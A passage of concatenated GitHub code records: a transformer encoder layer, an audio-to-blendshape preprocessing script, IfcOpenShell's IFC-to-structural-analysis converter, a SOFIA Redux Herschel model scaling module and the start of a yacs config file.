src_key_padding_mask: the mask for the src keys per batch.\n is_causal: flag for causaility. Present for compatibility with nn.\n \"\"\"\n src2 = self.self_attn(\n src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask\n )[0]\n src = src + self.dropout1(src2) # (seq_len, batch_size, d_model)\n src = src.permute(1, 2, 0) # (batch_size, d_model, seq_len)\n src = self.norm1(src)\n src = src.permute(2, 0, 1) # restore (seq_len, batch_size, d_model)\n src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n src = src + self.dropout2(src2) # (seq_len, batch_size, d_model)\n src = src.permute(1, 2, 0) # (batch_size, d_model, seq_len)\n src = self.norm2(src)\n src = src.permute(2, 0, 1) # restore (seq_len, batch_size, d_model)\n return src\n","repo_name":"ludovicobuizza/HAR-Transformer","sub_path":"src/transformer/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"393398348","text":"\nimport sys, argparse, os, multiprocessing.pool\nfrom tqdm import tqdm\n\nimport ffmpeg, torchaudio\nimport pandas as pd\nimport numpy as np\nimport torch, librosa\n\n\nclass Preprocessor:\n HERTZ = 50\n\n def __init__(self, source_dir, target_dir, ignored_columns, start_idx=0, end_idx=None):\n self.source_dir = source_dir\n self.start_idx = start_idx\n recording_directories = sorted([d.path for d in os.scandir(self.source_dir) if d.is_dir()])\n if end_idx is None:\n self.recording_directories = recording_directories[start_idx:]\n else:\n self.recording_directories = recording_directories[start_idx:end_idx]\n self.target_dir = target_dir\n self.ignored_columns = ignored_columns\n\n if not os.path.exists(self.target_dir):\n os.mkdir(self.target_dir)\n\n self.wav_dir = os.path.join(self.target_dir, 'wav')\n if not os.path.exists(self.wav_dir):\n os.mkdir(self.wav_dir)\n\n self.essentials_dir = os.path.join(self.target_dir, 'essentials')\n if not os.path.exists(self.essentials_dir):\n os.mkdir(self.essentials_dir)\n\n\n def save_audio(self, source_media, wav_name):\n target_audio = os.path.join(self.wav_dir, f'{wav_name}.wav')\n\n try:\n (ffmpeg\n .input(source_media, vn=None)\n .output(filename=target_audio,\n ac=1, \n acodec='pcm_s16le', \n ar='16k', \n loglevel='quiet', \n nostats=None)\n .run(overwrite_output=True))\n\n except:\n print(f'ffmpeg on {source_media} failed')\n\n print(f'{wav_name}.wav saved.')\n\n return target_audio\n\n\n def audio_preprocessing(self, wav):\n audio_tensor, sample_rate = torchaudio.load(wav)\n squeezed_audio_tensor = audio_tensor.squeeze()\n squeezed_audio_ndarray = squeezed_audio_tensor.numpy()\n\n n_fft = int(sample_rate / self.HERTZ)\n hop_length = int(sample_rate / (self.HERTZ * 2))\n D = librosa.stft(squeezed_audio_ndarray, \n n_fft=n_fft, \n win_length=n_fft, \n hop_length=hop_length, \n window='hamming')\n spectrogram, phase = librosa.magphase(D)\n\n # S = log(S+1)\n log_spectrogram = np.log1p(spectrogram)\n mean, stdev = log_spectrogram.mean(), log_spectrogram.std()\n normalized_spectrogram = (log_spectrogram - mean) / stdev\n normalized_spectrogram_tensor = torch.FloatTensor(normalized_spectrogram)\n\n return normalized_spectrogram_tensor.T, sample_rate\n\n def blendshape_preprocessing(self, source_shape):\n df = pd.read_csv(source_shape)\n shape = {key: value.tolist() for key, value in df.to_dict('series').items()\n if key not in self.ignored_columns}\n\n return shape\n\n\n def get_data(self, recording_directory):\n recording_files = os.listdir(recording_directory)\n\n for recording_file in recording_files:\n if recording_file.endswith('.mov'):\n media = os.path.join(recording_directory, recording_file)\n elif recording_file.endswith('cal.csv'):\n shape = os.path.join(recording_directory, recording_file)\n \n try:\n media\n except:\n print(f'Directory {recording_directory} does not contain video file')\n try:\n shape\n except:\n print(f'Directory {recording_directory} does not contain calibrated Blendshape csv file')\n\n return media, shape\n\n def save_essentials(self, spec, sample_rate, blendshape, pt_name):\n target_essentials = os.path.join(self.essentials_dir, f'{pt_name}.pt')\n essentials = (spec, sample_rate, blendshape)\n torch.save(essentials, target_essentials)\n print(f'{pt_name}.pt saved.')\n\n def preprocess(self):\n # if self.threads > 1:\n # with multiprocessing.pool.Pool(processes=self.threads) as pool:\n # self.data = pool.starmap(self.sample_dispatcher, zip(self.recording_directories, range(len(self.recording_directories))))\n\n # elif self.threads == 1:\n for recording_directory, count in zip(self.recording_directories, range(len(self.recording_directories))):\n count += self.start_idx\n print(f\"Processing No.{count} - {os.path.basename(recording_directory)}\")\n count_with_name = f\"{count}_{os.path.basename(recording_directory)}\"\n mov_path, source_shape = self.get_data(recording_directory)\n wav_audio_path = self.save_audio(mov_path, count_with_name)\n spec, sample_rate = self.audio_preprocessing(wav_audio_path)\n blendshape = self.blendshape_preprocessing(source_shape)\n self.save_essentials(spec, sample_rate, blendshape, count_with_name)\n\n def sample_dispatcher(self, recording_directory, count):\n count += self.start_idx\n print(f\"Processing No.{count} - {os.path.basename(recording_directory)}\")\n count_with_name = f\"{count}_{os.path.basename(recording_directory)}\"\n mov_path, source_shape = self.get_data(recording_directory)\n wav_audio_path = self.save_audio(mov_path, count_with_name)\n spec, sample_rate = self.audio_preprocessing(wav_audio_path)\n blendshape = self.blendshape_preprocessing(source_shape)\n return spec, sample_rate, blendshape, count_with_name\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Preprocess data')\n parser.add_argument('--source', help='Path to source directory', required=True)\n parser.add_argument('--target', help='Path to target directory', required=True)\n parser.add_argument('--start_idx', help='Start index of source', default=0)\n parser.add_argument('--threads', help='threads', default=1)\n parser.add_argument('--ignore', nargs='*', help='List of ignored columns', default=[])\n\n args = parser.parse_args()\n\n preprocessor = Preprocessor(\n source_dir=args.source,\n target_dir=args.target, \n ignored_columns=args.ignore,\n start_idx=int(args.start_idx))\n preprocessor.preprocess()\n","repo_name":"ishine/speech2blendshape","sub_path":"new_preprocess.py","file_name":"new_preprocess.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"23924372323","text":"from __future__ import division\nfrom __future__ import print_function\nimport json\nimport ifcopenshell\nimport numpy as np\nfrom pathlib import Path\n\n\nclass IFC2CA:\n def __init__(self, filename):\n self.filename = filename\n self.file = None\n self.result = {}\n self.warnings = []\n self.tol = 1e-06\n\n def convert(self):\n self.file = ifcopenshell.open(self.filename)\n for model in self.file.by_type(\"IfcStructuralAnalysisModel\"):\n elements = self.get_structural_items(model, item_type=\"IfcStructuralMember\")\n connections = self.get_structural_items(\n model, item_type=\"IfcStructuralConnection\"\n )\n\n materialdb = []\n materials = list(dict.fromkeys([e[\"material\"] for e in elements]))\n for mat in [mat for mat in materials if mat]:\n id = int(mat.split(\"|\")[1])\n material = self.get_material_properties(self.file.by_id(id))\n material[\"relatedElements\"] = [\n e[\"referenceName\"]\n for e in elements\n if \"material\" in e and e[\"material\"] == mat\n ]\n materialdb.append(material)\n\n profiledb = []\n profiles = list(\n dict.fromkeys([e[\"profile\"] for e in elements if \"profile\" in e])\n )\n for prof in [prof for prof in profiles if prof]:\n id = int(prof.split(\"|\")[1])\n profile = self.get_profile_properties(self.file.by_id(id))\n profile[\"relatedElements\"] = [\n e[\"referenceName\"]\n for e in elements\n if \"profile\" in e and e[\"profile\"] == prof\n ]\n profiledb.append(profile)\n\n self.result = {\n \"referenceName\": model.is_a() + \"|\" + str(model.id()),\n \"name\": model.Name,\n \"id\": model.GlobalId,\n \"elements\": elements,\n \"connections\": connections,\n \"db\": {\"materials\": materialdb, \"profiles\": profiledb},\n \"warnings\": self.warnings,\n }\n\n print(f\"Model {model.Name} converted\")\n print(f\"Number of elements: {len(elements)}\")\n print(f\"Number of connections: {len(connections)}\")\n print(f\"Number of materials: {len(materialdb)}\")\n print(f\"Number of profiles: {len(profiledb)}\")\n print(\"\")\n\n break\n\n def get_structural_items(self, model, item_type=\"IfcStructuralItem\"):\n items = []\n for group in model.IsGroupedBy:\n for item in group.RelatedObjects:\n if not item.is_a(item_type):\n continue\n data = self.get_item_data(item)\n if data:\n items.append(data)\n return items\n\n def get_item_data(self, item):\n transformation = self.get_transformation(item.ObjectPlacement)\n\n if item.is_a(\"IfcStructuralCurveMember\"):\n representation = self.get_representation(item, \"Edge\")\n material_profile = self.get_material_profile(item)\n if not representation:\n self.warnings.append(\n f\"No representation defined for {item.is_a()}|{item.id()}. Member excluded\"\n )\n return\n if not material_profile:\n self.warnings.append(f\"No material defined for {item.is_a()}|{item.id()}\")\n self.warnings.append(f\"No profile defined for {item.is_a()}|{item.id()}\")\n materialId = None\n profileId = None\n else:\n material = material_profile.Material\n materialId = material.is_a() + \"|\" + str(material.id())\n profile = material_profile.Profile\n profileId = profile.is_a() + \"|\" + str(profile.id())\n\n geometry = self.get_geometry(representation)\n orientation = self.get_1D_orientation(geometry, item.Axis)\n connections = self.get_connection_data(item.ConnectedBy)\n for conn in connections:\n if not conn[\"orientation\"]:\n conn[\"orientation\"] = orientation\n # --> Correct pointOnElement for eccentricity connection for ETABS files\n length = np.linalg.norm(np.array(geometry[1]) - np.array(geometry[0]))\n for c in connections:\n if c[\"eccentricity\"]:\n if (\n np.linalg.norm(np.array(c[\"eccentricity\"][\"pointOnElement\"]))\n > length + self.tol\n ):\n print(\n f\"{np.linalg.norm(np.array(c['eccentricity']['pointOnElement']))} > {length}\"\n )\n self.warnings.append(\n f\"Eccentricity in {item.is_a()}|{item.id()} corrected\"\n )\n c[\"eccentricity\"][\"pointOnElement\"][0] = length\n # End <--\n if transformation:\n geometry = self.transform_vectors(geometry, transformation)\n orientation = self.transform_vectors(\n orientation, transformation, include_translation=False\n )\n for c in connections:\n c[\"orientation\"] = self.transform_vectors(\n c[\"orientation\"], transformation, include_translation=False\n )\n if c[\"eccentricity\"]:\n c[\"eccentricity\"][\"vector\"] = self.transform_vectors(\n c[\"eccentricity\"][\"vector\"],\n transformation,\n include_translation=False,\n )\n\n return {\n \"referenceName\": f\"{item.is_a()}|{item.id()}\",\n \"name\": item.Name,\n \"id\": item.GlobalId,\n \"geometryType\": \"line\",\n \"predefinedType\": item.PredefinedType,\n \"geometry\": geometry,\n \"orientation\": orientation,\n \"material\": materialId,\n \"profile\": profileId,\n \"connections\": connections,\n }\n\n elif item.is_a(\"IfcStructuralSurfaceMember\"):\n representation = self.get_representation(item, \"Face\")\n material = self.get_material_profile(item)\n if not representation:\n self.warnings.append(\n f\"No representation defined for {item.is_a()}|{item.id()}. Member excluded\"\n )\n return\n if not material:\n self.warnings.append(f\"No material defined for {item.is_a()}|{item.id()}\")\n materialId = None\n else:\n materialId = material.is_a() + \"|\" + str(material.id())\n\n geometry = self.get_geometry(representation)\n orientation = self.get_2D_orientation(representation)\n connections = self.get_connection_data(item.ConnectedBy)\n for conn in connections:\n if not conn[\"orientation\"]:\n conn[\"orientation\"] = orientation\n if transformation:\n geometry = self.transform_vectors(geometry, transformation)\n orientation = self.transform_vectors(\n orientation, transformation, include_translation=False\n )\n for c in connections:\n c[\"orientation\"] = self.transform_vectors(\n c[\"orientation\"], transformation, include_translation=False\n )\n\n return {\n \"referenceName\": f\"{item.is_a()}|{item.id()}\",\n \"name\": item.Name,\n \"id\": item.GlobalId,\n \"geometryType\": \"surface\",\n \"predefinedType\": item.PredefinedType,\n \"thickness\": item.Thickness,\n \"geometry\": geometry,\n \"orientation\": orientation,\n \"material\": materialId,\n \"connections\": connections,\n }\n\n elif item.is_a(\"IfcStructuralPointConnection\"):\n representation = self.get_representation(item, \"Vertex\")\n if not representation:\n self.warnings.append(\n f\"No representation defined for {item.is_a()}|{item.id()}. Member excluded\"\n )\n return\n\n geometry = self.get_geometry(representation)\n orientation = self.get_0D_orientation(item.ConditionCoordinateSystem)\n if not orientation:\n orientation = np.eye(3).tolist()\n if transformation:\n geometry = self.transform_vectors(geometry, transformation)\n orientation = self.transform_vectors(\n orientation, transformation, include_translation=False\n )\n\n return {\n \"referenceName\": f\"{item.is_a()}|{item.id()}\",\n \"name\": item.Name,\n \"id\": item.GlobalId,\n \"geometryType\": \"point\",\n \"geometry\": geometry,\n \"orientation\": orientation,\n \"appliedCondition\": self.get_connection_input(item, \"point\"),\n \"relatedElements\": [\n f\"{con.is_a()}|{con.id()}\" for con in item.ConnectsStructuralMembers\n ],\n }\n\n elif item.is_a(\"IfcStructuralCurveConnection\"):\n representation = self.get_representation(item, \"Edge\")\n if not representation:\n self.warnings.append(\n f\"No representation defined for {item.is_a()}|{item.id()}. Member excluded\"\n )\n return\n\n geometry = self.get_geometry(representation)\n orientation = self.get_1D_orientation(geometry, item.Axis)\n if not orientation:\n orientation = np.eye(3).tolist()\n if transformation:\n geometry = self.transform_vectors(geometry, transformation)\n orientation = self.transform_vectors(\n orientation, transformation, include_translation=False\n )\n\n return {\n \"referenceName\": f\"{item.is_a()}|{item.id()}\",\n \"name\": item.Name,\n \"id\": item.GlobalId,\n \"geometryType\": \"line\",\n \"geometry\": geometry,\n \"orientation\": orientation,\n \"appliedCondition\": self.get_connection_input(item, \"line\"),\n \"relatedElements\": [\n f\"{con.is_a()}|{con.id()}\" for con in item.ConnectsStructuralMembers\n ],\n }\n\n def get_transformation(self, placement):\n if not placement:\n return None\n if placement.is_a(\"IfcLocalPlacement\"):\n if placement.PlacementRelTo:\n print(\n \"Warning! Object Placement with PlacementRelTo attribute is not supported and will be neglected\"\n )\n axes = placement.RelativePlacement\n location = np.array(self.get_coordinate(axes.Location))\n if axes.Axis and axes.RefDirection:\n xAxis = np.array(\n axes.RefDirection.DirectionRatios\n ) # this can be not accurate (in the xz plane)\n zAxis = np.array(axes.Axis.DirectionRatios)\n zAxis /= np.linalg.norm(zAxis)\n yAxis = np.cross(zAxis, xAxis)\n yAxis /= np.linalg.norm(yAxis)\n xAxis = np.cross(yAxis, zAxis)\n xAxis /= np.linalg.norm(xAxis)\n else:\n if np.allclose(location, np.array([0.0, 0.0, 0.0])):\n return None\n xAxis = np.array([1.0, 0.0, 0.0])\n yAxis = np.array([0.0, 1.0, 0.0])\n zAxis = np.array([0.0, 0.0, 1.0])\n if (\n np.allclose(location, np.array([0.0, 0.0, 0.0]))\n and np.allclose(xAxis, np.array([1.0, 0.0, 0.0]))\n and np.allclose(yAxis, np.array([0.0, 1.0, 0.0]))\n and np.allclose(zAxis, np.array([0.0, 0.0, 1.0]))\n ):\n return None\n return {\n \"location\": location,\n \"rotationMatrix\": np.array([xAxis, yAxis, zAxis]).transpose(),\n }\n else:\n print(\n f\"Warning! Object Placement is of type {placement.is_a()}, which is not supported. Default considered\"\n )\n return None\n\n def get_representation(self, element, rep_type):\n if not element.Representation:\n return None\n for representation in element.Representation.Representations:\n rep = self.get_specific_representation(representation, \"Reference\", rep_type)\n if rep:\n return rep\n else:\n # print(\"Trying without rep identifier\")\n for representation in element.Representation.Representations:\n rep = self.get_specific_representation(representation, None, rep_type)\n if rep:\n return rep\n\n def get_specific_representation(self, representation, rep_id, rep_type):\n if (\n representation.RepresentationIdentifier == rep_id or rep_id is None\n ) and representation.RepresentationType == rep_type:\n return representation\n if representation.RepresentationType == \"MappedRepresentation\":\n return self.get_specific_representation(\n representation.Items[0].MappingSource.MappedRepresentation,\n rep_id,\n rep_type,\n )\n\n def get_geometry(self, representation):\n # Maybe IfcOpenShell can use create_shape here to simplify this, but\n # supposedly structural models are very simple anyway, so perhaps we\n # can do without it.\n item = representation.Items[0]\n if item.is_a(\"IfcEdge\"):\n return [\n self.get_coordinate(item.EdgeStart.VertexGeometry),\n self.get_coordinate(item.EdgeEnd.VertexGeometry),\n ]\n\n elif item.is_a(\"IfcFaceSurface\"):\n edges = item.Bounds[0].Bound.EdgeList\n coords = []\n for edge in edges:\n coords.append(\n self.get_coordinate(edge.EdgeElement.EdgeStart.VertexGeometry)\n )\n return coords\n\n elif item.is_a(\"IfcVertexPoint\"):\n return self.get_coordinate(item.VertexGeometry)\n\n def get_coordinate(self, point):\n if point.is_a(\"IfcCartesianPoint\"):\n return list(point.Coordinates)\n\n def get_0D_orientation(self, axes):\n if axes and axes.Axis and axes.RefDirection:\n xAxis = np.array(\n axes.RefDirection.DirectionRatios\n ) # this can be not strictly perpendicular (in the xz plane)\n zAxis = np.array(axes.Axis.DirectionRatios)\n zAxis /= np.linalg.norm(zAxis)\n yAxis = np.cross(zAxis, xAxis)\n yAxis /= np.linalg.norm(yAxis)\n xAxis = np.cross(yAxis, zAxis)\n xAxis /= np.linalg.norm(xAxis)\n\n return [xAxis.tolist(), yAxis.tolist(), zAxis.tolist()]\n else: # return None and copy the elements orientation\n return None\n\n def get_1D_orientation(self, geometry, zAxis):\n xAxis = np.array(geometry[1]) - np.array(geometry[0])\n xAxis /= np.linalg.norm(xAxis)\n zAxis = np.array(\n zAxis.DirectionRatios\n ) # this can be not strictly perpendicular (in the xz plane)\n yAxis = np.cross(zAxis, xAxis)\n yAxis /= np.linalg.norm(yAxis)\n zAxis = np.cross(xAxis, yAxis)\n zAxis /= np.linalg.norm(zAxis)\n\n return [xAxis.tolist(), yAxis.tolist(), zAxis.tolist()]\n\n def get_2D_orientation(self, representation):\n item = representation.Items[0]\n if item.is_a(\"IfcFaceSurface\"):\n axes = item.FaceSurface.Position\n orientation = self.get_0D_orientation(axes)\n if not orientation:\n self.warnings.append(\n f\"No local placement for Plane related to {item.is_a()}|{item.id()}. A unit orientation is considered\"\n )\n return np.eye(3).tolist()\n if not item.SameSense:\n orientation = [[-v for v in vec] for vec in orientation]\n return orientation\n\n def transform_vectors(self, geometry, trsf, include_translation=True):\n if not any(\n isinstance(el, list) for el in geometry\n ): # single point which contains no list\n geometry = [geometry]\n globalGeometry = []\n\n for p in geometry:\n gp = trsf[\"rotationMatrix\"].dot(np.array(p))\n if include_translation:\n gp += trsf[\"location\"]\n globalGeometry.append(gp.tolist())\n\n if len(globalGeometry) == 1: # single point\n globalGeometry = globalGeometry[0]\n\n return globalGeometry\n\n def get_material_profile(self, element):\n if not element.HasAssociations:\n return None\n for association in element.HasAssociations:\n if not association.is_a(\"IfcRelAssociatesMaterial\"):\n continue\n material = association.RelatingMaterial\n if material.is_a(\"IfcMaterialProfileSet\"):\n # For now, we only deal with a single profile\n return material.MaterialProfiles[0]\n if material.is_a(\"IfcMaterialProfileSetUsage\"):\n return material.ForProfileSet.MaterialProfiles[0]\n if material.is_a(\"IfcMaterial\"):\n return material\n\n def get_material_properties(self, material):\n psets = material.HasProperties\n\n if self.get_pset_properties(psets, \"Pset_MaterialMechanical\"):\n mechProps = self.get_pset_properties(psets, \"Pset_MaterialMechanical\")\n else:\n mechProps = self.get_pset_properties(psets, None)\n\n if self.get_pset_properties(psets, \"Pset_MaterialCommon\"):\n commonProps = self.get_pset_properties(psets, \"Pset_MaterialCommon\")\n else:\n commonProps = self.get_pset_properties(psets, None)\n\n return {\n \"referenceName\": material.is_a() + \"|\" + str(material.id()),\n \"name\": material.Name,\n \"category\": material.Category,\n \"mechProps\": mechProps,\n \"commonProps\": commonProps,\n }\n\n def get_pset_property(self, psets, pset_name, prop_name):\n for pset in psets:\n if pset.Name == pset_name or pset_name is None:\n for prop in pset.Properties:\n if prop.Name == prop_name:\n return prop.NominalValue.wrappedValue\n\n def get_pset_properties(self, psets, pset_name):\n for pset in psets:\n if pset.Name == pset_name or pset_name is None:\n d = {}\n for prop in pset.Properties:\n propName = prop.Name[0].lower() + prop.Name[1:]\n d[propName] = prop.NominalValue.wrappedValue\n return d\n\n def get_profile_properties(self, profile):\n if profile.is_a(\"IfcRectangleProfileDef\"):\n return {\n \"referenceName\": profile.is_a() + \"|\" + str(profile.id()),\n \"profileName\": profile.ProfileName,\n \"profileType\": profile.ProfileType,\n \"profileShape\": \"rectangular\",\n \"xDim\": profile.XDim,\n \"yDim\": profile.YDim,\n }\n\n if profile.is_a(\"IfcIShapeProfileDef\"):\n psets = profile.HasProperties\n\n if self.get_pset_properties(psets, \"Pset_ProfileMechanical\"):\n mechProps = self.get_pset_properties(psets, \"Pset_ProfileMechanical\")\n else:\n mechProps = self.get_i_section_properties(profile, \"iSymmetrical\")\n\n return {\n \"referenceName\": f\"{profile.is_a()}|{profile.id()}\",\n \"profileName\": profile.ProfileName,\n \"profileType\": profile.ProfileType,\n \"profileShape\": \"iSymmetrical\",\n \"mechProps\": mechProps,\n \"commonProps\": {\n \"flangeThickness\": profile.FlangeThickness,\n \"webThickness\": profile.WebThickness,\n \"overallDepth\": profile.OverallDepth,\n \"overallWidth\": profile.OverallWidth,\n \"filletRadius\": profile.FilletRadius,\n },\n }\n\n def get_connection_data(self, itemList):\n return [\n {\n \"referenceName\": f\"{rel.is_a()}|{rel.id()}\",\n \"id\": rel.GlobalId,\n \"relatingElement\": f\"{rel.RelatingStructuralMember.is_a()}|{rel.RelatingStructuralMember.id()}\",\n \"relatedConnection\": f\"{rel.RelatedStructuralConnection.is_a()}|{rel.RelatedStructuralConnection.id()}\",\n \"orientation\": self.get_0D_orientation(rel.ConditionCoordinateSystem),\n \"appliedCondition\": self.get_connection_input(\n rel,\n self.get_geometry_type_from_connection(\n rel.RelatedStructuralConnection\n ),\n ),\n \"eccentricity\": None\n if not rel.is_a(\"IfcRelConnectsWithEccentricity\")\n else {\n \"vector\": [\n 0.0\n if not rel.ConnectionConstraint.EccentricityInX\n else rel.ConnectionConstraint.EccentricityInX,\n 0.0\n if not rel.ConnectionConstraint.EccentricityInY\n else rel.ConnectionConstraint.EccentricityInY,\n 0.0\n if not rel.ConnectionConstraint.EccentricityInZ\n else rel.ConnectionConstraint.EccentricityInZ,\n ],\n \"pointOnElement\": self.get_coordinate(\n rel.ConnectionConstraint.PointOnRelatingElement\n ),\n },\n }\n for rel in itemList\n ]\n\n def get_geometry_type_from_connection(self, connection):\n if connection.is_a(\"IfcStructuralPointConnection\"):\n return \"point\"\n if connection.is_a(\"IfcStructuralCurveConnection\"):\n return \"line\"\n if connection.is_a(\"IfcStructuralSurfaceConnection\"):\n return \"surface\"\n\n def get_connection_input(self, connection, geometryType):\n if connection.AppliedCondition:\n if geometryType == \"point\":\n return {\n \"dx\": connection.AppliedCondition.TranslationalStiffnessX.wrappedValue,\n \"dy\": connection.AppliedCondition.TranslationalStiffnessY.wrappedValue,\n \"dz\": connection.AppliedCondition.TranslationalStiffnessZ.wrappedValue,\n \"drx\": connection.AppliedCondition.RotationalStiffnessX.wrappedValue,\n \"dry\": connection.AppliedCondition.RotationalStiffnessY.wrappedValue,\n \"drz\": connection.AppliedCondition.RotationalStiffnessZ.wrappedValue,\n }\n\n if geometryType == \"line\":\n return {\n \"dx\": connection.AppliedCondition.TranslationalStiffnessByLengthX.wrappedValue,\n \"dy\": connection.AppliedCondition.TranslationalStiffnessByLengthY.wrappedValue,\n \"dz\": connection.AppliedCondition.TranslationalStiffnessByLengthZ.wrappedValue,\n \"drx\": connection.AppliedCondition.RotationalStiffnessByLengthX.wrappedValue,\n \"dry\": connection.AppliedCondition.RotationalStiffnessByLengthY.wrappedValue,\n \"drz\": connection.AppliedCondition.RotationalStiffnessByLengthZ.wrappedValue,\n }\n\n if geometryType == \"surface\":\n return {\n \"dx\": connection.AppliedCondition.TranslationalStiffnessByAreaX.wrappedValue,\n \"dy\": connection.AppliedCondition.TranslationalStiffnessByAreaY.wrappedValue,\n \"dz\": connection.AppliedCondition.TranslationalStiffnessByAreaZ.wrappedValue,\n }\n\n return connection.AppliedCondition\n\n def get_i_section_properties(self, profile, profileShape):\n if profileShape == \"iSymmetrical\":\n tf = profile.FlangeThickness\n tw = profile.WebThickness\n h = profile.OverallDepth\n b = profile.OverallWidth\n\n A = b * h - (b - tw) * (h - 2 * tf)\n Iy = b * (h ** 3) / 12 - (b - tw) * ((h - 2 * tf) ** 3) / 12\n Iz = (2 * tf) * (b ** 3) / 12 + (h - 2 * tf) * (tw ** 3) / 12\n Jx = 1 / 3 * ((h - tf) * (tw ** 3) + 2 * b * (tf ** 3))\n\n return {\n \"crossSectionArea\": A,\n \"momentOfInertiaY\": Iy,\n \"momentOfInertiaZ\": Iz,\n \"torsionalConstantX\": Jx,\n }\n\n\nif __name__ == \"__main__\":\n fileNames = [\n \"cantilever_01\",\n \"portal_01\",\n \"grid_of_beams\",\n \"slab_01\",\n \"structure_01\",\n \"building_02\",\n ]\n files = fileNames\n\n for fileName in files:\n BASE_PATH = Path(\n \"/home/jesusbill/Dev-Projects/github.com/IfcOpenShell/analysis-models/ifcFiles/\"\n )\n ifc2ca = IFC2CA(BASE_PATH / f\"{fileName}.ifc\")\n ifc2ca.convert()\n with open(BASE_PATH / f\"{fileName}.json\", \"w\") as f:\n f.write(json.dumps(ifc2ca.result, indent=4))\n","repo_name":"IfcOpenShell/IfcOpenShell","sub_path":"src/ifc2ca/ifc2ca.py","file_name":"ifc2ca.py","file_ext":"py","file_size_in_byte":26025,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"71"} +{"seq_id":"86284217892","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"Scale models to account for object distance\"\"\"\n\nimport os\nimport pandas as pd\nimport numpy as np\nfrom sofia_redux.calibration.pipecal_error import PipeCalError\n\n\ndef modconvert(infile, outfile, scale_factor=1.0):\n \"\"\"\n Scale a Herschel model by a constant factor.\n\n Parameters\n ----------\n infile : str\n Name of file containing Herschel model.\n outfile : str\n Name of file to write scaled model to.\n scale_factor : float\n Factor to scale model in `infile` by.\n\n Returns\n -------\n model : pandas.DataFrame\n The scaled model.\n\n \"\"\"\n index, freq, brightness_temp, flux, rj_temp = read_infile(infile)\n\n wave, flux, temp = sort_spectrum(freq, flux, brightness_temp)\n\n scaled_flux = scale_factor * flux\n\n plot_scaled_spectrum(wave, scaled_flux, scale_factor, infile)\n\n write_scaled_spectrum(wave, scaled_flux, scale_factor, temp,\n infile, outfile)\n\n model = pd.DataFrame({'wavelength': wave, 'flux': scaled_flux,\n 't_br': temp})\n return model\n\n\ndef read_infile(infile):\n \"\"\"\n Read in a Herschel model.\n\n Parameters\n ----------\n infile : str\n Name of Herchel file.\n\n Returns\n -------\n index : numpy.array\n Index value of each row in `infile`.\n freq : numpy.array\n Frequency of each row in `infile`.\n tbr : numpy.array\n Brightness temperature of each row in `infile`.\n flux : numpy.array\n Flux value of each row in `infile`.\n trj : numpy.array\n Rayleigh-Jeans temperature value of each row in `infile`.\n\n \"\"\"\n # There are a variable header lengths possible.\n # Loop through and look for when the line starts\n # with '1', the first index.\n nheader = 0\n try:\n with open(infile, 'r') as f:\n for line in f:\n if line.strip().startswith('1'):\n break\n nheader += 1\n except IOError:\n message = f'Unable to open {infile} in modconvert.'\n raise PipeCalError(message)\n index, freq, tbr, flux, trj = np.genfromtxt(infile, unpack=True,\n skip_header=nheader)\n return index, freq, tbr, flux, trj\n\n\ndef sort_spectrum(freq, flux, brightness_temp):\n \"\"\"\n Sort the flux and brightness temp by increasing wavelength.\n\n Parameters\n ----------\n freq : numpy.array\n Frequency data.\n flux : numpy.array\n Flux data.\n brightness_temp : numpy.array\n Brightness temperature data.\n\n Returns\n -------\n w : numpy.array\n Wavelength of each data point.\n f : numpy.array\n Flux at each wavelength in `w`.\n t : numpy.array\n Brightness temperature at each wavelength in `w`.\n\n \"\"\"\n # Speed of light in microns/sec\n clight = 2.9979e14\n wave = clight / (freq * 1e9)\n\n # Sort the data by wavelength\n sortind = np.argsort(wave)\n w = wave[sortind]\n f = flux[sortind]\n t = brightness_temp[sortind]\n\n return w, f, t\n\n\ndef plot_scaled_spectrum(wave, scaled_flux, scale_factor, infile):\n \"\"\"\n Plot the scaled Herschel model.\n\n Parameters\n ----------\n wave : numpy.array\n Wavelength data of spectrum.\n scaled_flux : numpy.array\n Flux data of spectrum.\n scale_factor : numpy.array\n Scale factor applied to Herschel model.\n infile : str\n Name of Herschel model.\n\n Returns\n -------\n None\n\n \"\"\"\n from matplotlib.backends.backend_agg \\\n import FigureCanvasAgg as FigureCanvas\n from matplotlib.figure import Figure\n\n fig = Figure(figsize=(10, 10))\n FigureCanvas(fig)\n ax = fig.add_subplot(1, 1, 1)\n\n ax.plot(wave, scaled_flux)\n ax.set_xlim([30, 300])\n ax.set_xscale('log')\n ax.set_yscale('log')\n ax.set_xlabel('Wavelength (microns)')\n ax.set_ylabel('Flux (Jy)')\n ax.set_title(f'Scale = {scale_factor:.3f}')\n fig.savefig(f'scaled_flux_{os.path.basename(infile).split(\".\")[0]}.png',\n bbox_inches='tight')\n\n\ndef write_scaled_spectrum(wave, scaled_flux, scale_factor, temp,\n infile, outfile):\n \"\"\"\n Write the scaled Herschel model to file.\n\n Parameters\n ----------\n wave : numpy.array\n Wavelength data of spectrum.\n scaled_flux : numpy.array\n Flux data of spectrum.\n scale_factor : float\n Scale factor applied to Herschel model.\n temp : numpy.array\n Brightness temperature data of spectrum.\n infile : str\n Name of Herschel file.\n outfile : str\n Name of file to create with scaled spectrum.\n\n Returns\n -------\n None\n\n \"\"\"\n with open(outfile, 'w') as outf:\n outf.write('; {0:s}\\n'.format(infile))\n outf.write('; FSCALE = {}\\n'.format(scale_factor))\n outf.write('; Wave (microns) Flux (Jy) T_br (K) '\n ' Fscale = {0:.3f}\\n'.format(scale_factor))\n\n for i in range(len(wave)):\n outf.write(f'{wave[i]:.6f}\\t{scaled_flux[i]:.6f}\\t{temp[i]:.6f}\\n')\n","repo_name":"SOFIA-USRA/sofia_redux","sub_path":"sofia_redux/calibration/standard_model/modconvert.py","file_name":"modconvert.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"35242886255","text":"from yacs.config import CfgNode as CN\n\ndef set_cfg(cfg):\n\n # ------------------------------------------------------------------------ #\n # Basic options\n # ------------------------------------------------------------------------ #\n # Dataset 